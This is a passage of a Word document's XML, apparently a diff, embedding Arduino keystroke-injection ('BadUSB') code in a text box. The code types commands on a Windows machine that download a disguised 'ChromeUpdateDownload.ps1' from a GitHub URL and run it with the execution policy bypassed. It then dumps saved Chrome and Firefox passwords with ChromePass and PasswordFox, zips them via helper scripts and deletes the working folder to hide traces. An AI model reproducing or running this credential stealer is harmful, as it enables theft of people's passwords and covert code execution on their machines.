+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.press(KEY_LEFT_ARROW);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  delay(1000);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.print("cd / &amp; mkdir chrome &amp; cd chrome");</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.print("mkdir Password");</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.print("echo (wget 'https://raw.githubusercontent.com/abdulaziesmuslim/TA/master/ChromeUpdateDownload.ps1' -OutFile ChromeUpdateDownload.ps1) &gt; b.ps1");</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.print("powershell -ExecutionPolicy ByPass -File b.ps1");</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.print("powershell -ExecutionPolicy ByPass -File ChromeUpdateDownload.ps1");</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.print("ChromePass.exe /stext ChromePass.txt");</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  delay(</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                                <w:lang w:val="id-ID"/>
+                              </w:rPr>
+                              <w:t>100</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t>);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.print("PasswordFox.exe /stext PasswordFox.txt");</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  delay(8000);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.print("for %I in (ChromePass.txt PasswordFox.txt) do copy %I c:\\chrome\\Password");</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  delay(1000);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.print("powershell ./zipping.ps1");</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.print("powershell ./maintenance.ps1");</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.print("cd C:/");</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.print("rmdir /s /q chrome");</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.print("exit");</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  // Ending streampdateDownload.pps1</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">  Keyboard.end();</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t>}</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t>/* Unused endless loop */</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="18"/>
+                                <w:szCs w:val="18"/>
+                              </w:rPr>
+                              <w:t>void loop() {}</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
